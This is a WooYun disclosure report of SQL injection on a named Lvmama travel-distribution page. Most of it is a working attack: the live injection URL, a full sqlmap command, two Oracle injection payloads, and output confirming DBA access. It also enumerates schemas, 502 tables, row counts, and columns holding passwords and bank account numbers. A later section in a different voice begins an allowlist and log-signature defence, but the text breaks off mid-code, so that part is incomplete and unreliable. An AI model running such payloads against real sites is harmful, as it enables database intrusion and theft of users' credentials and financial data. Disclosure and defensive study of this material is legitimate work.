WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
WooYun Drops articles, online viewer: http://drop.zone.ci/
Disclosure timeline:
2015-11-09: Details sent to the vendor, awaiting vendor handling
2015-11-09: Vendor confirmed; details visible to the vendor only
2015-11-19: Details opened to core white hats and domain experts
2015-11-29: Details opened to ordinary white hats
2015-12-09: Details opened to intern white hats
2015-12-24: Details opened to the public
I suddenly noticed that a lot of the published vulnerabilities were about the Lvmama travel site, so I came to test it too, knowing nothing at all! Does this one need login verification? Maybe it can be seen without logging in; if so, let's test it!

Will there be a gift?

Injection point: http://fenxiao.lvmama.com/m2c/2/list0.jsp?area_id=10034&key=&sdate=2015-11-10&tagid=&catid=&orderby=3&minprice=100&maxprice=700

The catid parameter is injectable: appending a single quote (') makes the page return an error, which suggests injection. When I tested without --level 3, catid was injectable but sqlmap could not detect it; after adding --level 3 it came out without trouble!
sqlmap.py -u "http://fenxiao.lvmama.com/m2c/2/list0.jsp?area_id=10034&key=&sdate=2015-11-10&tagid=&catid=&orderby=3&minprice=100&maxprice=700" --threads 10 --dbms "Oracle" --level 3 --current-user --current-db --is-dba
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: catid
    Type: error-based
    Title: Oracle error-based - Parameter replace
    Payload: area_id=10034&key=&sdate=2015-11-10&tagid=&catid=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(105)||CHR(109)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (1434=1434) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(121)||CHR(98)||CHR(108)||CHR(113)||CHR(62))) FROM DUAL)&orderby=3&minprice=100&maxprice=700

    Type: AND/OR time-based blind
    Title: Oracle time-based blind - Parameter replace
    Payload: area_id=10034&key=&sdate=2015-11-10&tagid=&catid=(SELECT (CASE WHEN (7573=7573) THEN DBMS_PIPE.RECEIVE_MESSAGE(CHR(100)||CHR(100)||CHR(97)||CHR(120),5) ELSE 7573 END) FROM DUAL)&orderby=3&minprice=100&maxprice=700
---
[01:35:19] [INFO] the back-end DBMS is Oracle
web application technology: Apache, JSP
back-end DBMS: Oracle
[01:35:19] [INFO] fetching current user
[01:35:19] [INFO] retrieved: SAAS14
current user: 'SAAS14'
[01:35:19] [INFO] fetching current database
[01:35:19] [INFO] resumed: SAAS14
[01:35:19] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'SAAS14'
[01:35:19] [INFO] testing if current user is DBA
current user is DBA: True
[01:50:25] [INFO] the SQL query used returns 20 entries
[01:50:25] [INFO] starting 10 threads
[01:50:25] [INFO] resumed: CTXSYS
[01:50:25] [INFO] resumed: DBSNMP
[01:50:25] [INFO] resumed: DMSYS
[01:50:25] [INFO] resumed: EXFSYS
[01:50:25] [INFO] resumed: MDSYS
[01:50:25] [INFO] resumed: OLAPSYS
[01:50:25] [INFO] resumed: ORDSYS
[01:50:25] [INFO] resumed: OUTLN
[01:50:25] [INFO] resumed: SAAS15
[01:50:25] [INFO] resumed: SAAS14
[01:50:25] [INFO] resumed: SAAS17
[01:50:25] [INFO] resumed: SAAS16
[01:50:25] [INFO] resumed: SAAS19
[01:50:25] [INFO] resumed: SAAS18
[01:50:25] [INFO] resumed: SYS
[01:50:25] [INFO] resumed: SYSMAN
[01:50:25] [INFO] resumed: SYSTEM
[01:50:25] [INFO] resumed: TSMSYS
[01:50:25] [INFO] resumed: WMSYS
[01:50:25] [INFO] resumed: XDB
available databases [20]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SAAS14
[*] SAAS15
[*] SAAS16
[*] SAAS17
[*] SAAS18
[*] SAAS19
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB

Database: SAAS14
[502 tables]
AD_CONTENT
AD_PAGE
AD_SEAT
AD_SEAT_IMG
AD_SEAT_LINK
ALITRIP_HOTEL
ALITRIP_HOTEL_LOG
ALITRIP_HOTEL_ORDER
ALITRIP_HOTEL_ORDER_LOG
ALITRIP_HOTEL_PRODUCT
ALITRIP_HOTEL_PROD_LOG
ALITRIP_HOTEL_PROD_SYNC_LOG
ALITRIP_MENPIAO_LOG
ALITRIP_MENPIAO_NEWLOG
ALITRIP_MENPIAO_ORDER
ALITRIP_MENPIAO_PRODUCT
ALITRIP_MENPIAO_RECEIVE
ALITRIP_ROOMTYPE
B2B_CHANNEL_PRICE
B2B_CHANNEL_PRICE_DAY
B2B_DEALER
B2B_DEALER_DAY
B2B_DEALER_LOG
B2B_FREETRAVEL
B2B_GRADE_PRICE
B2B_ORDER_REPORT
B2B_PACKAGE
B2B_SQPRICE
B2B_SQPRICE_DETAIL
B2B_TICKET
B2B_TICKET_2012
B2B_TICKET_2013
B2B_TICKET_AIRPORT
B2B_TICKET_BD
B2B_TICKET_CHANGE
B2B_TICKET_CHANGE_DETAIL
B2B_TICKET_CODE
B2B_TICKET_COND
B2B_TICKET_CONFIRM_LOG
B2B_TICKET_DETAIL
B2B_TICKET_DETAIL_2012
B2B_TICKET_DETAIL_2013
B2B_TICKET_EX
B2B_TICKET_FINISH_LOG
B2B_TICKET_HIS
B2B_TICKET_LOG
B2B_TICKET_PEOPLE
B2B_TICKET_STARTINFO
B2B_TICKET_TRAFFIC
B2C_CHANNEL_PRICE
B2C_TAOBAO_CONFIG
B2C_TAOBAO_LOG
B2C_TAOBAO_NOTIFYRECEIVEMSG
B2C_TAOBAO_ORDER
B2C_TAOBAO_ORDER_LOG
B2C_TAOBAO_PRODUCT
BANK_CITYCODE
BILL_TO_UFSOFT
CM_CHANNEL_PRICE
CM_ORDER_LOG
CM_PAY_BALANCE
CM_PAY_DRAWMONEY
CM_PAY_DRAWMONEY_LOG
CM_PAY_MONEY_LOG
CM_PAY_ORDER_LOG
CM_PROD_LOG
CM_SYNC_LOG
CM_SYNC_PROD_LOG
CM_USER
CM_USER_INFO
CRUEL_CODE_CUST
CRUEL_CODE_LIST
CRUEL_CODE_LOG
CRUEL_CODE_MESSAGE
CRUEL_CODE_POS
CRUEL_CODE_VERIFY
CRUEL_EXP_CODE
CRUEL_EXP_LIST
CTRIPTICKET_ORDER_LOG
CUSTVIEW_INFO
CUST_BALANCE_LOG
CUST_INFO_GROUP_CHANNEL
CUST_VIEW_INFO
DIY_MDD
DIY_MDD_TYPE
DIY_REL_MDD_PROD
EXPCODE_DETAIL
EXPCODE_LIST
GROUP_INFO
GROUP_INFO_2ND
GROUP_INFO_DETAIL_2ND
GROUP_INFO_ORDER
GROUP_ORDER
GROUP_ORDER_PEOPLE
GROUP_SET
GROUP_YY_ORDER
GROUP_YY_ORDER_COND
GROUP_YY_ORDER_DETAIL
GROUP_YY_ORDER_LOG
GROUP_YY_ORDER_PEOPLE
GRP_CHANNEL_PRICE
GRP_GRADE_PRICE
GRP_ORDER
GRP_ORDER_DETAIL
GRP_TICKET
GRP_TICKET_PRICE
HOTEL_PLAN
HOTEL_PLAN_PRICE
HOTEL_PLAN_TYPE
HOTEL_WEEKSHOW
IMP_CODE
IMP_CODE_DETAIL
IMP_CODE_LIST
INFO_AIRPORT
INFO_AIRPORT_FLIGHT
INFO_AIRPORT_NUM
INFO_AIRPORT_NUM_LIST
INFO_AIRPORT_PRICE
INFO_AIRPORT_SEAT
INFO_AUTO_PRICE
INFO_CAR
INFO_CAR_TYPE
INFO_CATALOG
INFO_COMMENT
INFO_CONDS
INFO_CTRIPTICKET
INFO_FREETRAVEL
INFO_FREETRAVEL_TREE
INFO_GROUP
INFO_GROUP_DETAIL
INFO_HOTEL
INFO_HOTEL_NUM
INFO_HOTEL_PRICE
INFO_HOTEL_SET
INFO_INSURANCE
INFO_INSURANCE_LOG
INFO_INSURANCE_ORDER
INFO_JD
INFO_MEITUAN
INFO_NEWS
INFO_NEWS_READLOG
INFO_PLAN_PRICE
INFO_PROD
INFO_QUNAR_CONFIG
INFO_QUNAR_HOTEL
INFO_QUNAR_VIEW
INFO_TB_PRICE
INFO_TICKET
INFO_TICKET_CANCEL
INFO_TICKET_COND
INFO_TICKET_CUST
INFO_TICKET_DETAIL
INFO_TICKET_EX
INFO_TICKET_MAILTEMP
INFO_TICKET_NUM
INFO_TICKET_NUM_FOREX
INFO_TICKET_PRICE
INFO_TICKET_PRICE_FOREX
INFO_TICKET_REL
INFO_TICKET_RELAREA
INFO_TICKET_RELCAT
INFO_TICKET_RELVIEW
INFO_TICKET_REL_CUST
INFO_TOGO
INFO_TRAFFIC
INFO_TRAFFIC_NUM
INFO_TRAFFIC_NUM_LIST
INFO_TRAFFIC_PLACE
INFO_TRAFFIC_PRICE
INFO_TRAFFIC_SEAT
INFO_TRAFFIC_STATION
INFO_TRAFFIC_TIMES
INFO_TRAVEL
INFO_TRAVEL_CYCLE
INFO_TRAVEL_CYCLE_AUTO
INFO_TRAVEL_JOURNEY
INFO_TRAVEL_PRICE
INFO_TRAVEL_SEAT
INFO_TUNIU
INFO_VENUE
INFO_VENUE_NUM
INFO_VISA
INTERFACE_AILVTONG_LOG
INTERFACE_AIZHAOPIAO_LOG
INTERFACE_BEIZHU_LOG
INTERFACE_CAIHUISHIJIE_LOG
INTERFACE_CHANGLU_LOG
INTERFACE_CHANGLV_LOG
INTERFACE_CHANGYOUTONG_LOG
INTERFACE_CTRIP_HOLIDAY
INTERFACE_DADONGRT_LOG
INTERFACE_DDRT_LOG
INTERFACE_DIANPING_LOG
INTERFACE_DMZH_LOG
INTERFACE_DUMUQIAO_LOG
INTERFACE_FURONGYUAN_LOG
INTERFACE_FZG_BIZZONE
INTERFACE_GLYD
INTERFACE_HKDISNEY_LOG
INTERFACE_HOTEL
INTERFACE_HOTEL_BE_PRODUCT
INTERFACE_HOTEL_DDS_LOG
INTERFACE_HOTEL_DDS_ORDER_LOG
INTERFACE_HOTEL_JL
INTERFACE_HOTEL_JL_LOG
INTERFACE_HOTEL_JL_ORDER_LOG
INTERFACE_HOTEL_LTJL_LOG
INTERFACE_HOTEL_LTJL_ORDER_LOG
INTERFACE_HOTEL_LTJL_PRODUCT
INTERFACE_HOTEL_LYY_ORDER_LOG
INTERFACE_HOTEL_PRODUCT
INTERFACE_HOTEL_XH_LOG
INTERFACE_HOTEL_XH_ORDER_LOG
INTERFACE_HOTEL_XH_PRODUCT
INTERFACE_HUANQIU_LOG
INTERFACE_HUANTAOYOU_LOG
INTERFACE_HUAXIAPIAOLIAN_LOG
INTERFACE_IHUIU_LOG
INTERFACE_IMAGECO
INTERFACE_IMAGECO_CUST
INTERFACE_JD_CHANNEL_LOG
INTERFACE_JD_COUPON_PWD
INTERFACE_JIDIAOTONG_LOG
INTERFACE_KUIYUAN_LOG
INTERFACE_KUXIU_LOG
INTERFACE_LEXIAOXIANG_LOG
INTERFACE_LINE
INTERFACE_LINGNAN_LOG
INTERFACE_LIULIUKA_LOG
INTERFACE_LLK_CODE
INTERFACE_LLK_CUST
INTERFACE_LOG
INTERFACE_LONG
INTERFACE_LVMAMA_LOG
INTERFACE_MAP
INTERFACE_MEITUAN_DETAIL
INTERFACE_MEITUAN_LOG
INTERFACE_MJLD_LOG
INTERFACE_MOUNTWG_LOG
INTERFACE_MTS
INTERFACE_MTS_LOG
INTERFACE_PIAOFUTONG_LOG
INTERFACE_PIAOGJ_LOG
INTERFACE_PIAOGONGCHANG_LOG
INTERFACE_PIAOWUBA_LOG
INTERFACE_PIAOZHIJIA_LOG
INTERFACE_PRICE_RULE
INTERFACE_PROD_SYNC_LOG
INTERFACE_QUNAR
INTERFACE_QUNAR_HISTORY_LOG
INTERFACE_QUNAR_HISTOY_LOG
INTERFACE_QUNAR_HOLIDAY
INTERFACE_QUNAR_HOLIDAY_LOG
INTERFACE_QUNAR_HOTEL
INTERFACE_QUNAR_HOTEL_LOG
INTERFACE_QUNAR_INVOICE
INTERFACE_QUNAR_LINE_LOG
INTERFACE_QUNAR_LOG
INTERFACE_QUNAR_MOVE
INTERFACE_QUNAR_SUPPLIER_LOG
INTERFACE_SHANHAIGUAN_LOG
INTERFACE_SHOUKEYI_LOG
INTERFACE_SXLY
INTERFACE_SYNC_LOG
INTERFACE_TIANGUI_LOG
INTERFACE_TIANKE_LOG
INTERFACE_TICKET
INTERFACE_TONGCHENG_LOG
INTERFACE_TOURMART_LOG
INTERFACE_TUNIU_LOG
INTERFACE_VISITBEIJING_LOG
INTERFACE_WEIXUN_LOG
INTERFACE_WULONG_LOG
INTERFACE_XIAONIREN_LOG
INTERFACE_XIECHENG_LOG
INTERFACE_XINAIMOKE_LOG
INTERFACE_YANGGUANGLZ_LOG
INTERFACE_YINLVTONG_LOG
INTERFACE_YUANFAN_LOG
INTERFACE_YYJQ_LOG
INTERFACE_ZHONGJINGXIN_LOG
JOURNEY
JOURNEY_COMMENT
JOURNEY_DETAIL
JOURNEY_PRO_DETAIL
LVMAMA_CHUANHUO_LOG
LVMAMA_PRODUCT_INFO
LVMAMA_PRODUCT_LIST
LVMAMA_PUSH_LOG
LVMAMA_UPDATE_FLAG
LVMAMA_VIEW
LVMAMA_VIEW_INFO
LVWUTONGCODE_QUEUE
LVWUTONG_SMSMODE
LVWUTONG_TMPCODE
LVWUTONG_TMPCODE_GROUP
LVWUTONG_TMPCODE_LOG
LVWUTONG_TMPCODE_USE
NANHU_DEPTSET
ONLINE_DEBUG_LOG
ORDER_ABNORMAL_LOG
ORDER_API_PAY
ORDER_CHANGE_LOG
ORDER_LOG
ORDER_RELATION_LOG
PAY_BALANCE
PAY_CREDIT_FEE
PAY_DRAWMONEY
PAY_MOMEY_LOG
PAY_ORDER_LOG
PLAN_TABLE
QUNAR_PRICE_CACHE
RECE_APP
RECE_APP_DETAIL
RECE_INVOICE
RECE_INVOICE_DETAIL
RECE_PAYMENT_DETAIL
RECE_PAYMENT_LIST
RECE_STATEMENT_LIST
RUPD$_B2B_SETTLE_METHOD
RUPD$_B2B_TICKET
RUPD$_B2B_TICKET_DETAIL
RUPD$_HOTEL_BRAND
RUPD$_HOTEL_DISTRICT
RUPD$_HOTEL_INFO
RUPD$_INFO_AREA
RUPD$_INFO_AREA_EX
RUPD$_INFO_BANK
RUPD$_INFO_CAR
RUPD$_INFO_CONDS
RUPD$_INFO_HOTEL
RUPD$_INFO_NEWS
RUPD$_INFO_PROD
RUPD$_INFO_TICKET
RUPD$_INFO_TICKET_CANCEL
RUPD$_INFO_TICKET_COND
RUPD$_INFO_TICKET_DETAIL
RUPD$_INFO_TICKET_EX
RUPD$_INFO_TICKET_PRICE
RUPD$_INFO_TICKET_RELAREA
RUPD$_INFO_TICKET_RELVIEW
RUPD$_INFO_TRAVEL
RUPD$_INFO_VISA
RUPD$_INFO_VISA_SORT
RUPD$_INTERFACE_LLK_CUST
RUPD$_SAAS_PERMISSION
RUPD$_SAAS_USER_INFO
RUPD$_TB_USR_INFO
RUPD$_TB_VIEW_INFO
RUPD$_USR_TAG
RUPD$_USR_VIEW
SAAS_AREA_SUB
SAAS_BUY_LOG
SAAS_CLUSTER
SAAS_DATAMAN
SAAS_INFO_AREA
SAAS_INFO_SUB
SAAS_NEWS
SAAS_NEWS_SORT
SAAS_NOTICE
SAAS_ORDER_SOURCE
SAAS_PAY_DRAWMONEY
SAAS_PAY_DRAWMONEY_LOG
SAAS_PAY_PRODUCT_TYPE
SAAS_PAY_SERVICE
SAAS_TABLE_SQL
SAAS_VAP_ORDER
SAAS_VAP_PRODUCT
SAAS_VIEW_SUB
SETTLE_ACCOUNT
SETTLE_PAYABLE
SETTLE_PAYABLE_DETAIL
SETTLE_PAYABLE_LIST
SETTLE_PAYAPP
SETTLE_PAYAPP_DETAIL
SETTLE_STATEMENT_DETAIL
SETTLE_STATEMENT_LIST
SITE_IP2
SMS_CONSUME_LOG
SMS_GETMONEY_LOG
STOCK_ADD_LOG
STOCK_REPORT_DAY
SYS_CURRENCY_RATE
SYS_FEE_LOG
SYS_REFER
SYS_REPORT_DAY
SYS_SMS_LOG
SYS_SQL_HISTORY
SYS_SQL_QUEUE
TB_CONSUME_CODE
TB_RECEIVE_LOG
TEST_DB
TOUREASY_AREA
TOUREASY_LINE
TOUREASY_ORDER_INFO_PINGZHENG
TOUREASY_ORDER_QUEUE
TOUREASY_PRODUCT
TOUREASY_USR_LOG
TOUR_GUIDE
TRAFFIC_TO_TICKET
T_EQUIP
T_EQUIPSUB
T_LANDMARK
T_MATERIA
T_PRO_COMMON_NUM
T_PRO_COMMON_PRICE
T_PRO_DETAIL_COURSE
T_REGIONS
T_REGIONS_QD
T_REGIONS_SUBWAY
T_SPORTTYPE
T_VENUE
T_VENUE_COUNT
T_VENUE_PRICE
T_VENUE_RECORD
T_VENUE_SUB
UF_SOFT_QUEUE
UF_SOFT_SETTLE_PAYABLE
UF_SOFT_USR_CREDIT_LOG
UNIONPAY_CONFIG
UNIONPAY_TRADE_LOG
UPDATE_FOREXPRICE_LOG
USR_ACCOUNT
USR_ACCOUNT_LOG
USR_ACCOUNT_SET
USR_ATTENTION
USR_BALANCE_LOG
USR_BOOK
USR_CHECKIN_TYPE
USR_CREDIT
USR_CREDIT_LOG
USR_DEALER
USR_DEPT
USR_DIST
USR_DOCUMENT_TEMP
USR_ENTERPRISE_TAG
USR_GETPASS_LOG
USR_GRADE
USR_HOTEL_COND
USR_INFO
USR_INFO_B2C
USR_INFO_EXPRESS
USR_INTERFACE
USR_INTERFACE_INFO
USR_LOG
USR_LOGIN
USR_LOGIN_LOG
USR_LOG_2011
USR_LOG_2012
USR_LOG_2013
USR_MAILTEMP_LIST
USR_MANAGER_USER
USR_MEMBER
USR_MENU
USR_MSG
USR_MSG_COMMENT
USR_MSG_MONEY
USR_PAGES
USR_POWER_AREA
USR_PRINT_TEMP
USR_PROD_CODE
USR_PROD_WHILE_AREA
USR_PROD_WHILE_DETAIL
USR_PROD_WHILE_GROUP
USR_PROD_WHILE_LIST
USR_PROD_WHILE_TREE
USR_SCORE
USR_SCORE_DETAIL
USR_SCORE_LOG
USR_SCORE_RULE
USR_VIEW_BAK
USR_VIEW_BOUNTY
USR_VIEW_COLUMN
USR_VIEW_COPY
USR_VIEW_LINK
USR_VIEW_MSG
USR_VIEW_MSG_HIS
USR_VIEW_NAV
USR_VIEW_PAGE
USR_VIEW_TEMPLATE
WX_AD
WX_AD_DETAIL
WX_AD_SEND_LOG
WX_COUPON_SCEEN
WX_COUPON_SEND_LOG
WX_KEY
WX_MSG
WX_MSG_TEMP
WX_ORDER_TASK
WX_SCENE
WX_SCENE_IN
WX_SCENE_LOG
WX_SEND_HISTORY
WX_SEND_QUEUE
WX_SET
WX_TREE
WX_USER_INFO
XIECHENG_HOTEL_INFO
XIECHENG_HOTEL_LOG
XIECHENG_HOTEL_ORDER
XIECHENG_HOTEL_STATE
INTERFACE_KUIYUAN_LOG

Database: SAAS14 (row counts)
Table                      Entries
LVMAMA_PUSH_LOG            2502247
LVMAMA_VIEW                69067
USR_LOG                    56983
CM_ORDER_LOG               49229
B2B_TICKET_PEOPLE          32502
PAY_ORDER_LOG              29363
B2B_TICKET                 27955
B2B_TICKET_DETAIL          27955
B2B_TICKET_EX              27926
CM_SYNC_LOG                27562
INTERFACE_LVMAMA_LOG       25698
LVMAMA_PRODUCT_LIST        23209
INFO_TICKET                23208
ORDER_LOG                  22026
INFO_TICKET_RELVIEW        16473
LVMAMA_CHUANHUO_LOG        14566
USR_LOGIN_LOG              11318
PAY_BALANCE                3750
PAY_MOMEY_LOG              2669
B2B_TICKET_CHANGE          1306
CM_SYNC_PROD_LOG           856
B2B_CHANNEL_PRICE          626
LVMAMA_VIEW_INFO           610
INFO_TICKET_NUM            559
USR_LOGIN                  431
INFO_TICKET_CUST           415
B2B_CHANNEL_PRICE_DAY      382
USR_INFO                   377
USR_CREDIT_LOG             369
WX_SCENE_LOG               308
USR_GETPASS_LOG            208
INFO_TICKET_EX             136
LVMAMA_PRODUCT_INFO        72
USR_ATTENTION              65
ORDER_ABNORMAL_LOG         50
WX_USER_INFO               45
USR_INFO_B2C               44
USR_INTERFACE_INFO         41
WX_AD_DETAIL               23
USR_MEMBER                 18
INFO_TICKET_PRICE          6
WX_AD                      5
USR_CREDIT                 4
WX_AD_SEND_LOG             4
WX_MSG_TEMP                2
CUST_INFO_GROUP_CHANNEL    1
INFO_CONDS                 1
INFO_TICKET_CANCEL         1
INTERFACE_XIECHENG_LOG     1
LVMAMA_UPDATE_FLAG         1
SAAS_DATAMAN               1
USR_DOCUMENT_TEMP          1
USR_INFO_EXPRESS           1

Database: SAAS14
Table: USR_LOG [7 columns]
Column            Type
CUST_ID           NUMBER
LOG_DATE          DATE
LOG_DESC          VARCHAR2
LOG_NUM           VARCHAR2
LOG_TYPE          NUMBER
PARENT_CUST_ID    NUMBER
USER_ID           VARCHAR2

Database: SAAS14
Table: USR_LOGIN_LOG [7 columns]
Column            Type
COOKIEID          VARCHAR2
CUST_ID           NUMBER
IP                VARCHAR2
LOGIN_DATE        DATE
LOGIN_TYPE        NUMBER
PARENT_CUST_ID    NUMBER
USER_ID           VARCHAR2

Database: SAAS14
Table: USR_INFO_EXPRESS [9 columns]
Column            Type
ACCOUNT_NO        VARCHAR2
CUST_ID           NUMBER
FROM_ADDRESS      VARCHAR2
FROM_COM          VARCHAR2
FROM_MAN          VARCHAR2
FROM_TEL          VARCHAR2
PARENT_CUST_ID    NUMBER
SHIP_INFO         VARCHAR2
UPDATE_DATE       DATE

Database: SAAS14
Table: USR_CREDIT [8 columns]
Column            Type
ALL_CREDIT_NUM    NUMBER
CREATE_DATE       DATE
CREDIT_CUST_ID    NUMBER
CREDIT_NUM        NUMBER
CREDIT_TYPE       NUMBER
CUST_ID           NUMBER
ID                NUMBER
USE_CREDIT_NUM    NUMBER

Database: SAAS14
Table: USR_INFO [95 columns]
Column                 Type
KEY                    VARCHAR2
ACCOUNT                VARCHAR2
ACCOUNT_NAME           VARCHAR2
AGREEMENT_DATE         DATE
AGREEMENT_IP           VARCHAR2
AGREEMENT_USER         VARCHAR2
ANDROID_UID            VARCHAR2
AREA_ID                NUMBER
ATTENT_COUNT           NUMBER
BANK_ACCOUNT_NAME      VARCHAR2
BANK_ACCOUNT_NO        VARCHAR2
BANK_CITY              VARCHAR2
BANK_CITYCODE          VARCHAR2
BANK_NAME              VARCHAR2
BANK_PROVINCE          VARCHAR2
BANK_TYPE              VARCHAR2
BEIANHAO               VARCHAR2
CHECK_PRINT_NUM        NUMBER
CHECK_PRINT_PRICE      VARCHAR2
CONTRACT_END_DATE      DATE
CONTRACT_PERSON        VARCHAR2
CONTRACT_START_DATE    DATE
CURRENCY_TYPE          NUMBER
CUST_CODE              VARCHAR2
CUST_DESC              CLOB
CUST_GAT_FEE           NUMBER
CUST_GAT_LIMIT         NUMBER
CUST_GRADE             NUMBER
CUST_ID                NUMBER
CUST_NAME              VARCHAR2
CUST_PAY_FEE           NUMBER
CUST_TYPE              NUMBER
CUST_WEBSITE           VARCHAR2
DEPOSIT                NUMBER
DYCON                  VARCHAR2
DYSHOW                 NUMBER
FEE                    NUMBER
GET_MONEY_MODE         NUMBER
INTERFACE_PAY_TYPE     NUMBER
IS_B2B                 NUMBER
IS_CHECK               NUMBER
IS_CHECK_VALUES        VARCHAR2
IS_CONFIRM_ORDER       NUMBER
IS_DISCOUNT            NUMBER
IS_GAT_MONEY           NUMBER
IS_GROUP               NUMBER
IS_POST                NUMBER
IS_PRODMANAGER         NUMBER
IS_SAAS                NUMBER
IS_SENDSMS             NUMBER
IS_WHILE               NUMBER
LAST_IP                VARCHAR2
LINK_ADDRESS           VARCHAR2
LINK_EMAIL             VARCHAR2
LINK_FAX               VARCHAR2
LINK_MOBILE            VARCHAR2
LINK_NAME              VARCHAR2
LINK_PHONE             VARCHAR2
LINK_QQ                VARCHAR2
LINK_SOURCE            VARCHAR2
LOGIN_COUNT            NUMBER
LOGO                   VARCHAR2
MANAGER_MEMO           CLOB
ORDER_COUNT            NUMBER
ORDER_CUST_POWER       NUMBER
ORDER_MONEY            NUMBER
ORDER_POWER_FIELD      VARCHAR2
ORDER_TICKET           NUMBER
PARENT_AGENT_ID        NUMBER
PARENT_CUST_ID         NUMBER
PAY_MODE               NUMBER
PRICESTATE_PUSHMAIL    VARCHAR2
PROD_COUNT             NUMBER
REG_DATE               DATE
REG_IP                 VARCHAR2
REMARK                 VARCHAR2
REPORT_POWER           VARCHAR2
RETURN_MODE            NUMBER
SALE_CHANNEL           VARCHAR2
SALE_COUNT             NUMBER
SALE_MONEY             NUMBER
SALE_TICKET            NUMBER
SALE_TYPE              NUMBER
SEAL_PATH              VARCHAR2
SENDMSG_MOBILE         VARCHAR2
SENDMSG_SMS            VARCHAR2
SERVICE_FEE_PAY        NUMBER
SOURCE_URL             VARCHAR2
STATE                  NUMBER
STOP_DATE              DATE
STOP_IP                VARCHAR2
STOP_USER              VARCHAR2
USER_ID                VARCHAR2
VIP                    NUMBER
WHILE_RELCODE          VARCHAR2

Database: SAAS14
Table: PAY_MOMEY_LOG [17 columns]
Column                  Type
CUR_BALANCE             NUMBER
CUST_ID                 NUMBER
ID                      NUMBER
PARENT_CUST_ID          NUMBER
PAY_ACCOUNT             VARCHAR2
PAY_BALANCE_ID          NUMBER
PAY_DATE                DATE
PAY_LOG                 CLOB
PAY_NUM                 NUMBER
PAY_SERVICE             VARCHAR2
PAY_SERVICE_ORDER_ID    VARCHAR2
PAY_TYPE                NUMBER
REC_BALANCE             NUMBER
STATE                   NUMBER
USER_ID                 VARCHAR2
USER_REMARK             CLOB
WORKFLOWNO              VARCHAR2

Database: SAAS14
Table: USR_MEMBER [26 columns]
Column               Type
ACCOUNT              VARCHAR2
ACCOUNT_NAME         VARCHAR2
BANK_ACCOUNT_NAME    VARCHAR2
BANK_ACCOUNT_NO      VARCHAR2
BANK_CITY            VARCHAR2
BANK_NAME            VARCHAR2
BANK_PROVINCE        VARCHAR2
BANK_TYPE            VARCHAR2
BOOK_COUNT           NUMBER
DEPOSIT              NUMBER
EMAIL                VARCHAR2
IMG                  VARCHAR2
LAST_LOGIN           DATE
LOGIN_COUNT          NUMBER
LOGIN_TYPE           NUMBER
MOBILE               VARCHAR2
ORDER_COUNT          NUMBER
ORDER_CUST_ID        NUMBER
OUT_USER_ID          VARCHAR2
PARENT_CUST_ID       NUMBER
PASSWORD             VARCHAR2
REG_DATE             DATE
STATUS               NUMBER
USER_ID              NUMBER
USER_NAME            VARCHAR2
VCODE                VARCHAR2

Database: SAAS14
Table: WX_USER_INFO [21 columns]
Column              Type
AREA_ID             NUMBER
CITY                VARCHAR2
COUNTRY             VARCHAR2
CREATE_DATE         DATE
CUST_ID             NUMBER
HEADIMGURL          VARCHAR2
LOGIN_DATE          DATE
NICKNAME            VARCHAR2
OPENID              VARCHAR2
ORDER_CUST_ID       NUMBER
PARENT_CUST_ID      NUMBER
PROVINCE            VARCHAR2
SEX                 NUMBER
SOURCE_ID           NUMBER
STATE               NUMBER
SUBSCRIBE_TIME      DATE
TREE_ID             NUMBER
UNSUBSCRIBE_TIME    DATE
USER_ID             VARCHAR2
USER_LANGUAGE       VARCHAR2
USER_MEMO           VARCHAR2

Database: SAAS14
Table: USR_LOGIN [32 columns]
Column              Type
CUST_ID             NUMBER
CZ_STARTTIME        DATE
CZCODE              VARCHAR2
DEPT_ID             NUMBER
DUTY_STATE          NUMBER
DYCON               VARCHAR2
DYSHOW              NUMBER
EMAIL               VARCHAR2
FAX                 VARCHAR2
IS_CZ               NUMBER
IS_DISPRICE         NUMBER
IS_MANAGER          NUMBER
IS_ORDERLIST        NUMBER
IS_PAY              NUMBER
IS_SHOWSYSTEMMSG    NUMBER
IS_VALIDATE         NUMBER
LAST_DATE           DATE
LAST_IP             VARCHAR2
LOGIN_COUNT         NUMBER
LYT_ID              VARCHAR2
MOBILE              VARCHAR2
PARENT_AGENT_ID     NUMBER
PASSWORD            VARCHAR2
PHONE               VARCHAR2
PWD                 VARCHAR2
ROLE_ID             NUMBER
ROLE_TYPE           NUMBER
USER_GRADE          NUMBER
USER_ID             VARCHAR2
USER_NAME           VARCHAR2
USER_PERMISSION     VARCHAR2
USER_STATE          NUMBER
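The two sqlmap payloads above are worth turning into something defenders can run. The following is an added example, not code from the report or from Lvmama: a strict allowlist check for the list0.jsp query string (the kind of input filtering the fix section calls for, applied before any value reaches SQL) and a scanner that flags, in Apache access-log lines, the Oracle error-based XMLType technique and the DBMS_PIPE.RECEIVE_MESSAGE time-based technique that sqlmap used against catid. The parameter rules (integer ids and prices, an ISO date, a short key) are assumptions drawn from the values shown on the page, and the log lines are constructed, with shortened copies of the payloads, rather than real traffic.

```python
"""Added example, not part of the WooYun report: allowlist validation for the
list0.jsp query string plus a log scanner for the Oracle payloads sqlmap used.
Parameter rules are assumptions from the values on the page; SAMPLE_LOG is
constructed, not real Lvmama traffic."""
import re
from urllib.parse import parse_qs

# Assumed allowlist for /m2c/2/list0.jsp: numeric ids and prices (or empty),
# an ISO date, and a short free-text key with SQL metacharacters excluded.
PARAM_RULES = {
    "area_id": re.compile(r"^\d{0,10}$"),
    "tagid": re.compile(r"^\d{0,10}$"),
    "catid": re.compile(r"^\d{0,10}$"),
    "orderby": re.compile(r"^\d{0,2}$"),
    "minprice": re.compile(r"^\d{0,10}$"),
    "maxprice": re.compile(r"^\d{0,10}$"),
    "sdate": re.compile(r"^(\d{4}-\d{2}-\d{2})?$"),
    "key": re.compile(r'^[^\'"();|]{0,100}$'),
}

# Signatures for the techniques in the sqlmap output: error-based via
# XMLType(...) FROM DUAL, time-based via DBMS_PIPE.RECEIVE_MESSAGE, and the
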